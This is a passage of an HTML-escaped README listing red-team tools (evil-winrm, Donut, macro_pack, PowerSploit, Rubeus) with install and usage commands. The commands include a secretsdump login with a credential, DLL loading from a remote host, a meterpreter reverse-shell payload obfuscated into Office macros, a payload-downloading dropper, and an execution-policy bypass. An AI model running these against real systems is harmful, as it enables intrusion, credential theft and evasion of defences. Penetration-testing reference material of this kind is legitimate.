10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266110-8f60d6e8-009a-4dea-9e33-8a712aeaf2ac.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266110-8f60d6e8-009a-4dea-9e33-8a712aeaf2ac.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy\" rel=\"nofollow\"\u003ehttps://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/Hackplayers/evil-winrm\"\u003eevil-winrm\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-evil-winrm\" class=\"anchor\" aria-label=\"Permalink: 🔙evil-winrm\" href=\"#evil-winrm\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eEvil-WinRM is a tool that provides a 
command line interface for Windows Remote Management (WinRM: \u003cem\u003eA service that allows administrators to remotely execute commands on a Windows machine\u003c/em\u003e).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eEvil-WinRM allows an attacker to remotely connect to a Windows machine using WinRM and execute arbitrary commands.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSome features include:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eLoading in memory Powershell scripts\u003c/li\u003e\n\u003cli\u003eLoading in memory dll files bypassing some AVs\u003c/li\u003e\n\u003cli\u003eLoading x64 payloads\u003c/li\u003e\n\u003cli\u003ePass-the-hash support\u003c/li\u003e\n\u003cli\u003eUploading and downloading local and remote files\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Git)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo gem install winrm winrm-fs stringio logger fileutils\ngit clone https://github.com/Hackplayers/evil-winrm.git\ncd evil-winrm\"\u003e\u003cpre\u003esudo gem install winrm winrm-fs stringio logger fileutils\ngit clone https://github.com/Hackplayers/evil-winrm.git\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e evil-winrm\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Ruby gem)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"gem install evil-winrm\"\u003e\u003cpre\u003egem install evil-winrm\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eAlternative installation instructions can be found \u003ca href=\"https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp 
dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations\nevil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'\n\n# Upload local files to victim\nupload local_filename\nupload local_filename destination_filename\n\n# Download remote files to local machine\ndownload remote_filename\ndownload remote_filename destination_filename\n\n# Execute .Net assembly into victim memory\nInvoke-Binary /opt/csharp/Rubeus.exe\n\n# Load DLL library into victim memory\nDll-Loader -http http://10.10.10.10/SharpSploit.dll\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations\u003c/span\u003e\nevil-winrm -i 192.168.1.100 -u Administrator -p \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003eMySuperSecr3tPass123!\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -s \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e/home/foo/ps1_scripts/\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e/home/foo/exe_files/\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Upload local files to victim\u003c/span\u003e\nupload local_filename\nupload local_filename destination_filename\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Download remote files to local machine\u003c/span\u003e\ndownload remote_filename\ndownload 
remote_filename destination_filename\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Execute .Net assembly into victim memory\u003c/span\u003e\nInvoke-Binary /opt/csharp/Rubeus.exe\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Load DLL library into victim memory\u003c/span\u003e\nDll-Loader -http http://10.10.10.10/SharpSploit.dll\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage documentation can be found \u003ca href=\"https://github.com/Hackplayers/evil-winrm#documentation\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266192-ad53c125-7b3b-4a91-89c1-01c42cb21ef3.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266192-ad53c125-7b3b-4a91-89c1-01c42cb21ef3.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://korbinian-spielvogel.de/posts/heist-writeup/\" rel=\"nofollow\"\u003ehttps://korbinian-spielvogel.de/posts/heist-writeup/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/TheWover/donut/\"\u003eDonut\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-donut\" class=\"anchor\" aria-label=\"Permalink: 🔙Donut\" href=\"#donut\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 
1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA shellcode generator for in-memory execution: Donut wraps a VBScript, JScript, EXE, DLL file or .NET assembly into position-independent shellcode that loads and runs the payload from memory. It can be used to run custom payloads on target systems without the need to drop files to disk.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Windows)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/thewover/donut.git\"\u003e\u003cpre\u003egit clone https://github.com/thewover/donut.git\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eTo generate the loader template, the dynamic library donut.dll, the static library donut.lib and the generator donut.exe: 
Start an x64 Microsoft Visual Studio Developer Command Prompt, change to the directory where you cloned the Donut repository and enter the following:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"nmake -f Makefile.msvc\"\u003e\u003cpre\u003enmake -f Makefile.msvc\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eTo do the same, except using MinGW-64 on Windows or Linux, change to the directory where you cloned the Donut repository and enter the following:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"make -f Makefile.mingw\"\u003e\u003cpre\u003emake -f Makefile.mingw\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Linux)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"pip3 install donut-shellcode\"\u003e\u003cpre\u003epip3 install donut-shellcode\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Creating shellcode from an XSL file that pops up a calculator.\nshellcode = donut.create(file=r\u0026quot;C:\\\\Tools\\\\Source\\\\Repos\\\\donut\\\\calc.xsl\u0026quot;)\n\n# Creating shellcode from an unmanaged DLL. 
Invokes DLLMain.\nshellcode = donut.create(file=r\u0026quot;C:\\Tools\\Source\\Repos\\donut\\payload\\test\\hello.dll\u0026quot;)\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Creating shellcode from an XSL file that pops up a calculator.\u003c/span\u003e\nshellcode = donut.create(file=r\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eC:\u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003eTools\u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003eSource\u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003eRepos\u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003edonut\u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003ecalc.xsl\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e)\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Creating shellcode from an unmanaged DLL. Invokes DLLMain.\u003c/span\u003e\nshellcode = donut.create(file=r\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eC:\\Tools\\Source\\Repos\\donut\\payload\\test\\hello.dll\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e)\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFor full usage information, see the donut \u003ca href=\"https://github.com/TheWover/donut/#4-usage\"\u003eGitHub Page\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSee \u003ca href=\"https://thewover.github.io/Bear-Claw/\" rel=\"nofollow\"\u003ea recent blog post\u003c/a\u003e from The Wover for more info.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210077893-9d42cc2f-0ea0-414f-8103-42e29429321b.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210077893-9d42cc2f-0ea0-414f-8103-42e29429321b.png\" alt=\"image\" style=\"max-width: 
100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/sevagas/macro_pack\"\u003eMacro_pack\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-macro_pack\" class=\"anchor\" aria-label=\"Permalink: 🔙Macro_pack\" href=\"#macro_pack\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA tool used to automatize the obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for red teaming.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Binary)\u003c/strong\u003e\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eGet the latest binary from \u003ca href=\"https://github.com/sevagas/macro_pack/releases/\"\u003ehttps://github.com/sevagas/macro_pack/releases/\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDownload binary on PC with genuine Microsoft Office installed.\u003c/li\u003e\n\u003cli\u003eOpen console, CD to binary dir and call the binary\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Git)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight 
highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/sevagas/macro_pack.git\ncd macro_pack\npip3 install -r requirements.txt\"\u003e\u003cpre\u003egit clone https://github.com/sevagas/macro_pack.git\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e macro_pack\npip3 install -r requirements.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Help Page\npython3 macro_pack.py --help\n\n# List all supported file formats\nmacro_pack.exe --listformats\n# Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba\n\n# Obfuscate Empire stager VBA file and generate a MS Word document:\nmacro_pack.exe -f empire.vba -o -G myDoc.docm\n\n# Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)\necho \u0026quot;https://myurl.url/payload.exe\u0026quot; \u0026quot;dropped.exe\u0026quot; | macro_pack.exe -o -t DROPPER -G \u0026quot;drop.xlsm\u0026quot; \n\n# Execute calc.exe via Dynamic Data Exchange (DDE) attack\necho calc.exe | macro_pack.exe --dde -G calc.xslx\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Help Page\u003c/span\u003e\npython3 macro_pack.py --help\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e List all supported file formats\u003c/span\u003e\nmacro_pack.exe --listformats\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.\u003c/span\u003e\nmsfvenom -p 
windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e macro_pack.exe -o -G meterobf.vba\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Obfuscate Empire stager VBA file and generate a MS Word document:\u003c/span\u003e\nmacro_pack.exe -f empire.vba -o -G myDoc.docm\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)\u003c/span\u003e\n\u003cspan class=\"pl-c1\"\u003eecho\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ehttps://myurl.url/payload.exe\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003edropped.exe\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e macro_pack.exe -o -t DROPPER -G \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003edrop.xlsm\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Execute calc.exe via Dynamic Data Exchange (DDE) attack\u003c/span\u003e\n\u003cspan class=\"pl-c1\"\u003eecho\u003c/span\u003e calc.exe \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e macro_pack.exe --dde -G calc.xslx\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/209868800-7fbcfdec-8ae8-4693-8438-feebc2309667.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/209868800-7fbcfdec-8ae8-4693-8438-feebc2309667.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" 
dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/PowerShellMafia/PowerSploit\"\u003ePowerSploit\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-powersploit\" class=\"anchor\" aria-label=\"Permalink: 🔙PowerSploit\" href=\"#powersploit\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA collection of PowerShell scripts and modules that can be used to achieve a variety of red teaming objectives.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSome of the features of PowerSploit:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eDump password hashes and extract clear-text passwords from memory\u003c/li\u003e\n\u003cli\u003eEscalate privileges and bypass security controls\u003c/li\u003e\n\u003cli\u003eExecute arbitrary PowerShell code and bypass execution restrictions\u003c/li\u003e\n\u003cli\u003ePerform network reconnaissance and discovery\u003c/li\u003e\n\u003cli\u003eGenerate payloads and execute exploits\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e \u003cem\u003e1. 
Save to PowerShell modules folder\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFirst you will need to download the \u003ca href=\"https://github.com/PowerShellMafia/PowerSploit\"\u003ePowerSploit Folder\u003c/a\u003e and save it to your PowerShell modules folder.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYour PowerShell modules folder path can be found with the following command:\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"$Env:PSModulePath\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003e$Env:PSModulePath\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e \u003cem\u003e2. Install PowerSploit as a PowerShell module\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou will then need to install the PowerSploit module (use the name of the downloaded folder).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003cem\u003eYour PowerShell execution policy might block you, to fix this run the following command.\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"powershell.exe -ep bypass\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003epowershell.exe -ep bypass\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNow you can install the PowerSploit module.\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"Import-Module PowerSploit\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eImport-Module PowerSploit\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate 
position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"Get-Command -Module PowerSploit\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eGet-Command -Module PowerSploit\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210267625-3135de58-df26-4e0a-9de4-741ad37d2eb9.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210267625-3135de58-df26-4e0a-9de4-741ad37d2eb9.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/GhostPack/Rubeus\"\u003eRubeus\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-rubeus\" class=\"anchor\" aria-label=\"Permalink: 🔙Rubeus\" href=\"#rubeus\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA tool that can be used to perform various actions related to Microsoft Active Directory (AD) environments, such as dumping password hashes, creating/deleting users, and modifying user 
properties.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSome of the features of Rubeus:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eKerberoasting\u003c/li\u003e\n\u003cli\u003eGolden ticket attacks\u003c/li\u003e\n\u003cli\u003eSilver ticket attacks\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Download)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can install the unofficial pre-compiled Rubeus binary \u003ca href=\"https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Compile)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eRubeus is compatible with \u003ca href=\"https://visualstudio.microsoft.com/vs/community/\" rel=\"nofollow\"\u003eVisual Studio 2019 Community Edition\u003c/a\u003e. Open the rubeus \u003ca href=\"https://github.com/GhostPack/Rubeus\"\u003eproject .sln\u003c/a\u003e, choose \"Release\", and build.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"Rubeus.exe -h\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eRubeus.exe -h\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208250015-674a6fee-95b7-4edf-bd59-fe459cd235ed.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208250015-674a6fee-95b7-4edf-bd59-fe459cd235ed.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca 
